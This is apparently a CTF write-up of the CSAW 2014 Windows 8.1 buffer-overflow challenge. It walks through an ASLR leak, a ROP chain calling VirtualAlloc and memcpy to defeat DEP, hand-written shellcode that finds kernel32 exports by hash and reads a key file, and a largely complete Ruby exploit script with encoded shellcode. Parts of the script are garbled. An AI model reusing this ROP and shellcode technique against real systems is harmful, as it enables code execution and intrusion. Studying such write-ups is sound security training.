Posted on by and filed under CSAW 2014.

For this challenge, we’re given an .exe file and a server that it’s running on. Running strings on the binary, we see that there’s a lot of text in the program. It’s all instructions on how to get started with Windows exploitation. One block that is particularly interesting is:

Send me exactly 1024 characters (with some constraints).

So, looking at where this string is used we can see that it’s printed out, and then a function is called that has GetStdHandle and ReadFile inside of it.

Vulnerable Fn Image

I think it’s safe to guess that the 0x800(2048) passed to that function is the amount to read, and that ReadFile is reading from input. Above that call we can see sub esp, 400h which is making only 0x400 bytes of room on the stack… so we have a classic buffer overflow!

One problem though. We don’t know where our buffer is! This problem description said this is a Windows 8.1 challenge, so we have to deal with ASLR and DEP(aka stack is not executable).


So, when running the binary, we get a prompt for a password. Inputting GreenhornSecretPassword!!! works and we get a menu. One of the options is (A)SLR. This will print out the address of a variable on the stack as well as the program base address. We figure that two variables on the stack will be the same distance apart from each-other on different systems, so we can use this to get the address of our vulnerable buffer! Starting it in a debugger, getting the ASLR variable printout, and setting a breakpoint in the vulnerable function… we subtract the address of the buffer at the breakpoint from the address printed and we’ve got our offset from the ASLR leak to our buffer: inputBuffer = aslrLeak-0x3F8


That took care of ASLR. But how do we get around DEP? Return Oriented Programming is the answer. On Windows, the flow we need goes like this:

  • VirtualAlloc a section of Readable, Writable, Executable memory to execute from.
  • memcpy our shellcode into this region of memory from wherever our input is
  • call the executable shellcode buffer.


So, using this knowledge, we build a ROP chain. To get started, we need to know where the first return address is on the stack compared to our input buffer. We do this in our debugger by just stepping to the first ret after our input buffer is read in. The return address will be the first value on the stack, and we can subtract that stack address from the address we knew our buffer was at. This gives us inputBuffer+0x402 as our first return address overwrite, and this will be where the ROP chain starts.

The ret will execute, pop the address we put at inputBuffer+0x402 off the stack, and execute at that address. We want to call VirtualAlloc…and a function that just calls VirtualAlloc is in the binary, so on our ROP chain we can put an offset from the base of the program to that.

rop = []

rop << [0xBBBBBBBB].pack("V") # there's a "pop ebp" at the end of our vulnfunc, put this on stack there for that.
rop << [baseaddr+0x1C0].pack("V") # return to virtualalloc! 

So, we’ve got execution going back to a function that VirtualAllocs, we need to set up arguments for it on the stack correctly. ESP is now pointing to the next spot in our ROP chain, and if we look at the VAlloc function we can see that this next spot + 4 is where the first argument is(and the next arguments are after that). Note that there is a push ebp at the beginning of the func that adds a 4 byte value to the stack, which makes the arguments in our rop(that would otherwise start at esp+4) coresspond to esp+8 in the assembly.

VAlloc function

So, we can make our chain:

rop = []

rop << [0xBBBBBBBB].pack("V") # there's a "pop ebp" at the end of our vulnfunc, put this on stack there for that.
rop << [baseaddr+0x1C0].pack("V") # return to virtualalloc! 
rop << [0x00000000].pack("V") # dunno
rop << [0x00000000].pack("V") # Valloc args - address (null, we don't care where) 
rop << [0x00000900].pack("V") # size - something big is good
rop << [0x00000040].pack("V") # protection flags - read, write, execute
rop << [0].pack("V") # write the RWX buffer address back somewhere :3 - 0 for now

Now, we can step through the function and we’ll see that when it gets to the ret, the value at ESP is our first 0 that didn’t matter to us at the time. This is one of the very important parts of ROP — we need to advance the stack past the values we had to have on the stack for this function call. This will place ESP at the next open spot in our ROP chain.

But how do we do this? Well, we know that 0 we didn’t care about will be the next address to be executed. We know that there’s 16 bytes of data after it that ESP needs to get past. We use something called a ROP gadget to do this. The ROP gadget we need should take 16 bytes off the stack and then return to the first value after that. We can find one at offset 0x99E in the binary:

pop edi
pop esi
pop edx
pop ebp

Remember our strategy from before? The next thing we need to call after this is memcpy to copy our input buffer into the RWX space. Naturally, the next ROP entry will be the address of a memcpy occurrence in the binary, then a gadget to clean up the stack by 4*number of arguments, then the next function…

But wait! Arguments for memcpy: destination, source, size. The destination should be our RWX buffer…which we don’t know until VAlloc is called. Luckily, the VAlloc function above has a fourth argument that represents an address to write the buffer address to. We can set that argument to ropStart+0x22 to point to a value we’ll leave as 0 when we build our ROP. So, we have:

rop = []

rop << [0xBBBBBBBB].pack("V") # there's a "pop ebp" at the end of our vulnfunc, put this on stack there for that.
rop << [baseaddr+0x1C0].pack("V") # return to virtualalloc! 
rop << [baseaddr+0x99E].pack("V") # gadget - advance by 16 bytes and ret!
rop << [0x00000000].pack("V") # Valloc args - address (null, we don't care where) 
rop << [0x00000900].pack("V") # size - something big is good
rop << [0x00000040].pack("V") # protection flags - read, write, execute
rop << [ropStart+0x22].pack("V") # write the RWX buffer address back to the position in our ROP chain of the memcpy dest argument

rop << [baseaddr+0x1F0].pack("V") # call memcpy(dst,src,sz) 
rop << [baseaddr+0x99E].pack("V") # CLEAN UP 16 bytes again! same gadget as before!

rop << [0x00000000].pack("V")     # dest - Zero, the virtualalloc will overwrite this with the address of the new buffe
rop << [inputbuff].pack("V")      # src - addr of shellcode in the input buffer.
rop << [dontcareSz].pack("V")             # size of shellcode to copy
rop << [0xAAAAAAAA].pack("V")     # garbage val fixup for the add esp, 0xC; pop ebp at the end of the memcpy fn

rop << [baseaddr+0x141].pack("V") # memcpy will ret to me with rwx buff in eax!

This is all there is to the ROP chain! The last entry to it is the address of a gadget that does “call eax” — because, luckily, eax happened to contain the RWX buffer after everything was done and copied.


We have our ROP chain copying the input buffer over and trying to call it. Now we need to give it some valid shellcode. If we look at the vulnfn there is a small restriction, though:

CSAW buffer check

Haha, OK, so it wants any of the letters in “CSAW” to occur in the first 4 bytes of the input buffer. We can make that happen:

shellcode =  "V\x90\x6A\x53\x90" 

The V is just to indicate we want the program to go to the vulnerable function, the input buffer starts after it. The code assembles to:

push 53h

The 53h satisfies the check for an S at index 2 and it passes the checks.

Getting into Windows Shellcoding is beyond the scope of this writeup, but the gist of my shellcode is:

  • Get addresses of useful functions from kernel32.dll(CreateFile, ReadFile)
  • Get address of output-to-user function from module base
  • Createfile “key”
  • ReadFile the handle returned by CreateFile
  • Call the output-to-user fn with the buffer read in.

Do all of this, and we get the flag output back to us.

My shellcode is more than a little hairy, as I store all the useful stuff arbitrarily on the stack without setting the stack up at the beginning like a normal function would. Don’t trust the comments, they might be outdated.

Here it is:


; find kernel32
push byte 0x30
db 0x5e ; pop esi...damnit nasm
db 0x64 ; mov eax, dword [fs:esi] ;[fs:ESI] into eax
db 0x8b ;
db 0x06 ;

mov esi, dword [eax+0xC]
mov esi, dword [esi+0x14]
mov eax, [esi+0x10] ; main.exe
add eax, 0x1000 ; .text
push eax ; store for l8r
;findKernel: ; fuck everything, we know it's: [exe, nt, kernel]
mov esi, dword [esi]
mov esi, dword [esi] ; KERNEL HEADER THING IN ESI!!!! WOW SO HARD
mov edx, dword [esi+0x10]
;jnz findKernel
; EDX contains kernel32 base, find getprocaddress. store exp table in esi, names in edi
push 0x7C0017A5 ; OpenFile hash 0x112704B8 GPA: 0x7C0DFCAA CreateFileA: 0x7C0017A5
push edx
call findSymbolByHash 
;push 0x00747874 ; key.txt
;push 0x2e79656b ; store filename on stack
push 0x0079656b ; key - stoer filename on stck
;push 0x00000000
;push 0x7478742e
;push 0x67616c66 ; flag.txt 
mov edi, esp    ; store for fn call
push edx ; save edx
push 0          ; templatefile -- null
push 0x80       ; flags -- fileattributenormal
push 3          ; creation disposition - open existng
push 0          ; security attrb. none
push 0x1        ; arg3 - share - READ|WRITE
push 0x80000000 ; arg2 - access - GENERIC_ALL
push edi        ; arg1 -- filename
call eax        ; createfile ;openfile(name, outbuffofshit, key)
pop edx ; restore edx
mov edi, eax    ; store handle to file :D
push 0x10fa6516 ; readfile hash
push edx
call findSymbolByHash
sub esp, 0x200
mov ecx, esp
push ecx ; store for l8r
push 0 ;junk
push ecx ; writable plz
sub ecx, 0x200 
push 0x200      ; bytes to read
push ecx        ; buffer to read into
push edi        ; "key0" we stored earlier
call eax ; ReadFile
pop ecx ; restore ecx, add 200 to get readin buffer.. then 200 more for main module handle we stored at start
sub ecx, 0x200
add esp, 0x204 ; 0x200 + 0x(num filename pushes)
pop eax        ; main module base
add eax, 0x460 ; +0x460 = write to network conn.
sub esp, 0x40C
push 0x100 ; sz
push ecx ; data
call eax ;41414141 ; call output to stdout fn.. base+0x460
  push esi
  push edi
  mov esi, dword [esp+0x0c] ; load function argument in esi
  xor edi, edi
  xor eax, eax
  lodsb ; load next byte of input string
  cmp al, ah
  je .hash_done ; check if at end of symbol
  ror edi, 0x0d ; rotate right 13 (0x0d)
  add edi, eax
  jmp near .hash_iter
  mov eax, edi
  pop edi
  pop esi
  retn 4

  mov ebp, [esp + 0x24] ; load 1st arg: dllBase
  mov eax, [ebp + 0x3c] ; get offset to PE signature
  ; load edx w/ DataDirectories array: assumes PE32
  mov edx, [ebp + eax + 4+20+96] 
  add edx, ebp ; edx:= addr IMAGE_EXPORT_DIRECTORY
  mov ecx, [edx + 0x18] ; ecx:= NumberOfNames
  mov ebx, [edx + 0x20] ; ebx:= RVA of AddressOfNames
  add ebx, ebp ; rva->va
  jecxz .error_done ; if at end of array, jmp to done
  dec ecx ; dec loop counter
  ; esi:= next name, uses ecx*4 because each pointer is 4 bytes
  mov esi, [ebx+ecx*4] 
  add esi, ebp ; rva->va
  push esi 
  call hashString ; hash the current string
  ; check hash result against arg #2 on stack: symHash
  cmp eax, [esp + 0x28]
  jnz .search_loop
  ; at this point we found the string in AddressOfNames
  mov ebx, [edx+0x24] ; ebx:= ordinal table rva
  add ebx, ebp ; rva->va
  ; turn cx into ordinal from name index. 
  ; use ecx*2: each value is 2 bytes
  mov cx, [ebx+ecx*2]
  mov ebx, [edx+0x1c] ; ebx:= RVA of AddressOfFunctions
  add ebx, ebp ; rva->va
  ; eax:= Export function rva. Use ecx*4: each value is 4 bytes
  mov eax, [ebx+ecx*4] 
  add eax, ebp ; rva->va
  jmp near .done
  xor eax, eax ; clear eax on error
  mov [esp + 0x1c], eax ; overwrite eax saved on stack
  retn 8

And here’s the full ruby script:

require 'socket'
require 'hexdump'

sock =""+ #"", 9998)
#"", 4444)
"", 9998)
#"", 4444)#"", 9998)

# just some util
class String
  def print(val)
    self.replace(self.to_s.force_encoding("BINARY") + val.force_encoding("BINARY"))#val.unpack("H*").join(""))
def recv_until(socket, str)
  data = ""
  while tmp = socket.recv(1024) and not tmp.empty?
    data += tmp
    if data.include? str
      return data

recv_until(sock, "Password:")
puts "[+] Got passwd prompt"
recv_until(sock, "Selection:")
puts "[+] Got selection menu"
# However, this is a greenhorn challenge, so your ASLR slide is: 0x00f40000 and the slide variable is stored at: 0x0106f934.
aslr_leak = recv_until(sock, "Selection:")
#print aslr_leak

leakedSlideAddr = aslr_leak[/0x(........).+0x(........)/,2].hex#0x34F4A4
leakedSlide = aslr_leak[/0x(........).+0x(........)/,1].hex#0x5f0000
puts "[+] Got ASLR val #{"%08x" % leakedSlide} on stack @ #{"%08x" % leakedSlideAddr}"

baseaddr = leakedSlide+0x401000 # stores the address that the program is loaded at -- program subtracted 0x401000 from value printed.
inputbuff =  leakedSlideAddr-0x3F8# stores location of the address on the stack where the input buffer is written
dontcareSz = 0x402 # size of buffer before we start overwriting rop? -- used for virtualalloc and copy...

puts "[+] Program loaded @ 0x#{"%08x" % baseaddr}, input buffer @ 0x#{"%08x" % inputbuff}"
#gets # - pause so we can attach a debugger!
fillme = ""
shellcode =  "V\x90\x6A\x53\x90" +
"\xbe\x30\x3f\x47\x5c\xda\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x43\x31\x77\x14\x03\x77\x14\x83\xef\xfc\xd2\xca\x2d" +
"\x6c\x4c\x51\x39\x8a\xfb\xe9\x31\x18\x8d\x1d\xc1\x58\x61" +
"\x1b\xd5\x74\x81\x23\x85\xff\xb7\xa8\x13\x8b\xe1\xbe\x33" +
"\x2e\x1a\xbf\xbf\x62\xcc\x28\x3f\x83\x0c\x3f\x2b\xe6\x75" +
"\xbf\x22\x0f\xd7\xd7\x34\xd0\xd7\x27\x5d\x50\xd7\x27\x9d" +
"\x38\xd4\x27\x9d\xb8\xb2\x27\x9d\xb8\x42\x40\x9c\xb8\x42" +
"\x90\xf6\xb8\x42\x90\x86\xee\xbd\x40\xdc\x99\x86\x09\xf7" +
"\xfc\xf2\xda\xa5\x16\x62\xdb\x49\xe7\xe3\x37\x49\xe5\xe3" +
"\xc7\xc3\x08\xb2\xaf\xd3\xca\x34\x30\x85\x4b\xdd\x30\x27" +
"\x4c\x1d\x59\x27\x4e\x1d\x99\x76\x19\xe2\x49\x21\x24\xf5" +
"\x6a\xd0\x26\x05\xea\x10\x22\x07\xec\x98\x73\x02\x8c\x9c" +
"\x83\x0c\xcd\x71\x8f\x08\xcd\x89\xf8\x10\xcc\x89\xf8\x41" +
"\x31\x59\xae\x36\x46\x2e\x6b\xb4\x69\x30\x8f\xf5\x49\x62" +
"\x48\x15\x3d\x71\x68\x1a\xb3\x84\xad\x4d\x23\x79\xce\x72" +
"\x35\x7e\x6e\xd2\x84\x7b\x91\x8a\x83\xe8\xb5\x6e\x1f\xb5" +
"\x89\xe5\x4b\x33\x8a\xf8\x99\xb0\x20\xe2\xd6\x9d\x94\x13" +
"\x02\xc2\xff\x5a\x5f\x31\x8b\x5d\xb1\x6c\x63\xe6\xb2\x6e" +
"\x8c\x23\x09\xb5\x5b\x26\x7d\x3e\xc1\xec\x7c\xaa\x90\x67" +
"\x72\x67\xd6\x2d\x97\x76\x03\x5a\xa3\xf3\xd2\xb4\x45\x01" +

puts "[+] shellcode len: #{shellcode.length}"

# ROP plan
# -- valloc RWX space
# -- memcpy shellcode from stack into space
# -- jmp space
# -- profit?
rop = []

rop << [0xBBBBBBBB].pack("V") # "pop ebp" at end, WE DO NOT CAAAAARE
rop << [baseaddr+0x1C0].pack("V") # virtualalloc - 0X400
#rop << [baseaddr+0x1FF].pack("V") # call memcpy(dst,src,sz) - 0X414 -- 0x1FE if we wanted push edx also
rop << [baseaddr+0x99E].pack("V") # ret addr of fn 2 - reduce stack
rop << [0x00000000].pack("V") # addr(null, we don't care where) -  0X404
rop << [0x00000900].pack("V") # sz - 0X408
rop << [0x00000040].pack("V") # prot flags 0X40C
rop << [inputbuff+dontcareSz+0x22].pack("V") # write the RWX buffer back somewhere :3 - 0X410
# eax now contains RWX buffptr
#########rop << # gadget to mov edx, eax
########## RWX buff in edx, let's fucking memcpy!
rop << [baseaddr+0x1F0].pack("V") # call memcpy(dst,src,sz) - 0X414 -- 0x1FE if we wanted push edx also
rop << [baseaddr+0x99E].pack("V") # CLEAN UP 16 DECIMAL FROM THE STACK :DDDDDD

rop << [0x00000000].pack("V")     # Zero, the virtualalloc will overwrite this with the address of the new buffer so we don't need the gadget above! - 0X418
rop << [inputbuff].pack("V")      # shellcode in the input buffer.
rop << [dontcareSz].pack("V")             # size of shellcode to copy

rop << [0xAAAAAAAA].pack("V")     # fixup for the add esp, 0xC; pop ebp at the end of the memcpy block

rop << [baseaddr+0x141].pack("V") # memcpy will ret to me with rwx buff in eax!

rop.each { |e|
#  print e

puts "[+] Sent Exploit"
puts sock.recv(1024)